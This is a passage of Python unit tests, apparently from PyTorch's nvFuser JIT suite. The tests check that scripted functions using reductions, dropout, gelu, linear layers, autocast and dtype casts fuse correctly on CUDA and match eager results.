@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_normalization_partition(self):
sizes = [3, 8, 5]
dtype = torch.float
device = "cuda"
x = torch.randn(sizes, dtype=dtype, device=device)
y = torch.randn(sizes, dtype=dtype, device=device)
z = torch.randn(sizes, dtype=dtype, device=device)
r_m = torch.randn(8, dtype=dtype, device=device)
r_v = torch.randn(8, dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, r_mean: torch.Tensor, r_var: torch.Tensor):
o = torch.add(x, y)
o = torch.nn.functional.softmax(o, dim=0)
o = torch.add(o, z)
o = torch.nn.functional.batch_norm(o, r_mean, r_var, training=True)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z, r_m, r_v)
jit_o = t_jit(x, y, z, r_m, r_v)
o = t(x, y, z, r_m, r_v)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z, r_m, r_v), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sum_to_one(self):
dtype = torch.float
device = "cuda"
x = torch.randn([4, 5, 6], dtype=dtype, device=device)
def t(x: torch.Tensor):
o = torch.add(x, 1)
o = torch.sum(o, dim=[0, 1, 2])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_single_reduction_broadcast(self):
dtype = torch.float
device = "cuda"
x = torch.randn([7, 4, 8], dtype=dtype, device=device)
y = torch.randn([4, 8], dtype=dtype, device=device)
z = torch.randn([1, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, y)
o = torch.add(o, z)
o = torch.sum(o, dim=[0])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_trivial_reduction(self):
dtype = torch.float
device = "cuda"
x = torch.randn([1, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor):
o = torch.add(x, 1)
o = torch.sum(o, dim=[0])
o = torch.sum(o, dim=[0])
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_profiling_node(self):
dtype = torch.float
device = "cuda"
x = torch.randn(4, 8, 8, 8, dtype=dtype, device=device)
def repro(x: torch.Tensor, alpha: float):
o = torch.rand_like(x)
o = torch.add(o, alpha)
return o
repro_jit = torch.jit.script(repro)
self._run_helper(repro_jit, repro, x, 0.6)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_sizes_op(self):
dtype = torch.float
device = "cuda"
x = torch.randn(2, 3, 4, 5, dtype=dtype, device=device)
y = torch.randn(2, 3, 4, 5, dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor):
o = x + y
o = torch.relu(o)
o = o.sum((1, 3))
return o.size()
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o, jit_o)
# since the output value is not used at all, the fusion operator should
# have been optimized away
self.assertGraphContainsExactly(t_jit.graph_for(x, y), FUSION_GUARD, 0)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_profile_ivalue(self):
dtype = torch.float
device = "cuda"
x = torch.randn([7, 4, 7], dtype=dtype, device=device)
y = torch.randn([7, 4, 7], dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, dim: List[int], keepdim: bool):
o = torch.add(x, y)
o = o.sum(dim, keepdim=keepdim)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, (0, 1), False)
jit_o = t_jit(x, y, (0, 1), False)
o = t(x, y, (0, 1), False)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, (0, 1), False), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sum_to_size(self):
dtype = torch.float
device = "cuda"
x = torch.randn([2, 4, 4], dtype=dtype, device=device)
y = torch.randn([2, 4, 4], dtype=dtype, device=device)
def t(x: torch.Tensor, y: torch.Tensor, new_size: List[int]):
o = torch.add(x, y)
o = o.sum_to_size(new_size)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, (4, 1))
jit_o = t_jit(x, y, (4, 1))
o = t(x, y, (4, 1))
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, (4, 1)), FUSION_GUARD)
# update shape: old kernel should handle dynamic shape well without
# recompilation
x = torch.randn([2, 5, 8], dtype=dtype, device=device)
y = torch.randn([2, 5, 8], dtype=dtype, device=device)
# (TODO) check executed kernel, should extend autograd.profiler to fused
# kernels
jit_o = t_jit(x, y, (5, 1))
o = t(x, y, (5, 1))
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_grad_sum_to_size(self):
dtype = torch.float
device = "cuda"
x = torch.randn([2, 4, 4], dtype=dtype, device=device).requires_grad_()
y = torch.randn([4], dtype=dtype, device=device).requires_grad_()
grad = torch.randn([2, 4, 4], dtype=dtype, device=device)
ref_x = x.detach().clone().requires_grad_()
ref_y = y.detach().clone().requires_grad_()
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.relu(o)
return o
# profiling runs for forward & backward
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o.backward(grad)
jit_o = t_jit(x, y)
jit_o.backward(grad)
x.grad = None
y.grad = None
jit_o = t_jit(x, y)
jit_o.backward(grad)
o = t(ref_x, ref_y)
o.backward(grad)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(x.grad, ref_x.grad)
self.assertEqual(y.grad, ref_y.grad)
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GUARD).run(bwd_graph)
# update shape: old kernel should handle dynamic shape well without
# recompilation
x = torch.randn([2, 5, 8], dtype=dtype, device=device).requires_grad_()
y = torch.randn([8], dtype=dtype, device=device).requires_grad_()
ref_x = x.detach().clone().requires_grad_()
ref_y = y.detach().clone().requires_grad_()
grad = torch.randn([2, 5, 8], dtype=dtype, device=device)
jit_o = t_jit(x, y)
# (TODO) check executed kernel, should extend autograd.profiler to fused
# kernels
jit_o.backward(grad)
o = t(ref_x, ref_y)
o.backward(grad)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(x.grad, ref_x.grad)
self.assertEqual(y.grad, ref_y.grad)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_inference_fusion(self):
dtype = torch.float
device = "cuda"
x = torch.randn([10, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o + 1.0
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, 0.15, False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_train_nograd_fusion(self):
dtype = torch.float
device = "cuda"
x = torch.randn([10, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o + 1.0
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, 0.0, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_train_nograd_prob_check(self):
dtype = torch.float
device = "cuda"
x = torch.randn([1024, 1024], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
for prob in [0.0, 0.15, 0.5, 0.85, 1.]:
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
self.assertTrue(jit_o.detach().isfinite().all().item())
num_elems = x.numel()
num_zeros = num_elems - jit_o.detach().count_nonzero().item()
percent_zeros = num_zeros / num_elems
self.assertTrue((percent_zeros >= (prob - 0.01)) and (percent_zeros <= (prob + 0.01)))
self.assertGraphContainsExactly(t_jit.graph_for(x, prob, True), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_training_fusion(self):
dtype = torch.float
device = "cuda"
x = torch.randn([10, 4, 8], dtype=dtype, device=device, requires_grad=True)
grads = torch.randn([10, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
# The drop probability needs to be set to zero given that the order of picking random
# numbers between eager mode and the jit is different
self._run_training_helper(t_jit, t, grads, x, 0.0, True)
def t2(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.softmax(x, dim=-1)
o = torch.nn.functional.dropout(o, p, training=train)
return o
t2_jit = torch.jit.script(t2)
# The drop probability needs to be set to zero given that the order of picking random
# numbers between eager mode and the jit is different
self._run_training_helper(t2_jit, t2, grads, x, 0.0, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_gelu(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
dtype = torch.float
device = "cuda"
x = torch.randn([1024, 1024], dtype=dtype, device=device, requires_grad=True)
grads = torch.randn([1024, 1024], dtype=dtype, device=device, requires_grad=False)
def t(x: torch.Tensor, mode : str):
o = torch.nn.functional.gelu(x, approximate=mode)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
self._run_training_helper(t_jit, t, grads, x, 'none')
self._run_training_helper(t_jit, t, grads, x, 'tanh')
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_training_prob_check(self):
dtype = torch.float
device = "cuda"
x = torch.randn([1024, 1024], dtype=dtype, device=device, requires_grad=True)
x_nograd = torch.randn([1024, 1024], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
for prob in [0.0, 0.15, 0.5, 0.85, 1.]:
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
self.assertTrue(jit_o.detach().isfinite().all().item())
num_elems = x.numel()
num_zeros = num_elems - jit_o.detach().count_nonzero().item()
percent_zeros = num_zeros / num_elems
self.assertTrue((percent_zeros >= (prob - 0.01)) and (percent_zeros <= (prob + 0.01)))
self.assertGraphContainsExactly(t_jit.graph_for(x, prob, True), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_linear(self):
in_feature = 2
out_feature = 8
# Changing the input dims to be 3-D to avoid eager mode bias fusion
# The bias fusion causes some precision issues with TF-32
x = torch.randn(2, 4, in_feature, dtype=torch.float32, device='cuda')
weight = torch.randn(out_feature, in_feature, dtype=torch.float32, device='cuda')
bias = torch.randn(out_feature, dtype=torch.float32, device='cuda')
def t(x: torch.Tensor, weight: torch.Tensor, bias: torch.Tensor):
o = torch.nn.functional.linear(x, weight, bias)
o = torch.relu(o)
return o
# bias set to true.
t_jit = torch.jit.script(t)
jit_o = t_jit(x, weight, bias)
jit_o = t_jit(x, weight, bias)
o = t(x, weight, bias)
self.assertEqual(o, jit_o)
# since the output value is not used at all, the fusion operator should
# have been optimized away
self.assertGraphContainsExactly(t_jit.graph_for(x, weight, bias), FUSION_GUARD, 1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_linear_symbolic_shapes(self):
def fn(x: int):
y = torch.zeros((x, x + 2)).cuda()
for i in range(2):
inp = torch.rand((x, x + i)).cuda()
weight = torch.rand((x + 2, x + i)).cuda()
bias = torch.rand((x, x + 2)).cuda()
y += torch.sin(torch.nn.functional.linear(inp, weight, bias))
return y
fn_s = torch.jit.script(fn)
fn_s(5)
fn_s(5)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_backward_type(self):
# not super useful to check gradient of integer/bool, so skipping here
type_pairs = [
(torch.float, torch.half),
(torch.double, torch.half),
(torch.float, torch.double),
]
if TEST_BF16:
type_pairs += [
(torch.float, torch.bfloat16),
(torch.double, torch.bfloat16),
]
for x_type, y_type in type_pairs:
x = torch.randn(4, 2, dtype=x_type, device='cuda', requires_grad=True)
y = torch.randn(4, 2, dtype=y_type, device='cuda', requires_grad=True)
grad = torch.randn(4, 2, dtype=torch.float, device='cuda')
def test1(x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.add(o, y)
o = torch.add(o, y)
o = torch.add(o, y)
o = o + 1.0
return o
test1_jit = torch.jit.script(test1)
for i in range(3):
jit_o = test1_jit(x, y)
jit_o.backward(grad)
bwd_graph = list(
list(test1_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(x.grad.dtype, x.dtype)
self.assertEqual(y.grad.dtype, y.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_autocast_1(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch._C._nn.linear(o, y)
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda', requires_grad=True)
y = torch.randn(4, 4, dtype=torch.float, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.half, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast():
jit_o = t_jit(x, y)
if i == 2 :
fwd_graph = t_jit.graph_for(x, y)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast():
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.half)
self.assertEqual(x.grad.dtype, x.dtype)
self.assertEqual(y.grad.dtype, y.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_autocast_2(self):
def t(x: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch.softmax(o, dim=-1)
o = o * 4.0
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.float, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast() :
jit_o = t_jit(x)
if i == 2 :
fwd_graph = t_jit.graph_for(x)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast():
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.float)
self.assertEqual(x.grad.dtype, x.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_autocast_1_bfloat(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch._C._nn.linear(o, y)
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda', requires_grad=True)
y = torch.randn(4, 4, dtype=torch.float, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
jit_o = t_jit(x, y)
if i == 2 :
fwd_graph = t_jit.graph_for(x, y)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.bfloat16)
self.assertEqual(x.grad.dtype, x.dtype)
self.assertEqual(y.grad.dtype, y.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_autocast_2_bfloat(self):
def t(x: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch.softmax(o, dim=-1)
o = o * 4.0
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.float, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast(dtype=torch.bfloat16) :
jit_o = t_jit(x)
if i == 2 :
fwd_graph = t_jit.graph_for(x)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.float)
self.assertEqual(x.grad.dtype, x.dtype)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_dtype_fp32_to_fp16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.half)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.float, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.half)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_dtype_fp16_to_fp32(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.float)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.float)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_dtype_fp16_to_fp16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.half)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.half)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_to_dtype_fp32_to_bf16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.bfloat16)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.float, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.bfloat16)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_to_dtype_bf16_to_fp32(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.float)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.float)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_to_dtype_bf16_to_bf16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.bfloat16)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.bfloat16)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(not TEST_MULTIGPU, "requires multiple CUDA device")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_multiple_device_pw(self):
def t(x):
o = x + 1.0
o = torch.relu(o)
return o
x = torch.randn(2, dtype=torch.float32, device="cuda")
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
torch.cuda.device(1)
x = x.to("cuda:1")
jit_o = t_jit(x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_graph_for_with_missing_optimized_engine(self):
x = torch.randn(8, 4, 2, dtype=torch.float, device="cuda").requires_grad_()
def t(x: torch.Tensor, flag: bool):
x = x + 1.0
x = torch.relu(x)
if flag:
o = x + 1.0
o = torch.relu(o)
else:
o = x + 2.0
o = torch.relu(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, False)
jit_o = t_jit(x, False)
jit_o = t_jit(x, True)
o = t(x, True)
self.assertEqual(o, jit_o)
# since the output value is not used at all, the fusion operator should
# have been optimized away
self.assertGraphContainsExactly(t_jit.graph_for(x, True), FUSION_GUARD, 1, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_branches(self):
in_feature = 2
out_feature = 4
x = torch.randn(4, in_feature, dtype=torch.float32, device='cuda')
weight = torch.randn(out_feature, in_feature, dtype=torch.float32, device='cuda')
bias = torch.randn(out_feature, dtype=torch.float32, device='cuda')
def t(x: torch.Tensor, weight: torch.Tensor, bias: torch.Tensor, flag: bool):
if flag:
o = torch.nn.functional.linear(x, weight, bias)
o = o + 1.0
o = torch.relu(o)
else:
o = x.sum()
o = o + 2.0
o = torch.relu(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, weight, bias, True)
jit_o = t_jit(x, weight, bias, True)
o = t(x, weight, bias, True)
self.assertEqual(o, jit_o)
# since the output value is not used at all, the fusion operator should
# have been optimized away
self.assertGraphContainsExactly(t_jit.graph_for(x, weight, bias, True), FUSION_GUARD, 1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_tensor(self):
x = torch.empty([], device="cuda", dtype=torch.float32)
def t(x: torch.Tensor):
o = x + 1.0
o = torch.nn.functional.relu(o)
return o
# bias set to true.
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o, jit_o)
# since the output value is not used at all, the fusion operator should
# have been optimized away
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
@unittest.skipIf(os.environ.get('PYTORCH_NO_CUDA_MEMORY_CACHING') is not None,
"skipping graph_rng when caching allocator is disabled")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(CUDA_MAJOR < 11, "requires CUDA11 or above")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_graph_rng(self):
self.assertTrue(torch._C._jit_nvfuser_enabled())
size = 10000
a = torch.randn((size,), device="cuda", dtype=torch.float)
def t(x):
o = x + 1.0
o = torch.nn.functional.dropout(o, p=0.1)
o = o + 1.0
o = torch.nn.functional.dropout(o, p=0.1)
return o
t_jit = torch.jit.script(t)
for _ in range(3):
t_jit(a)
self.assertGraphContainsExactly(t_jit.graph_for(a), FUSION_GUARD, 1)
# Control (jitted, ungraphed)
torch.cuda.manual_seed(5)
eager_out = a.clone()
for _ in range(3):
eager_out = t_jit(eager_out)
graph_in = a.clone()
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
torch.cuda.manual_seed(5)
g.capture_begin()
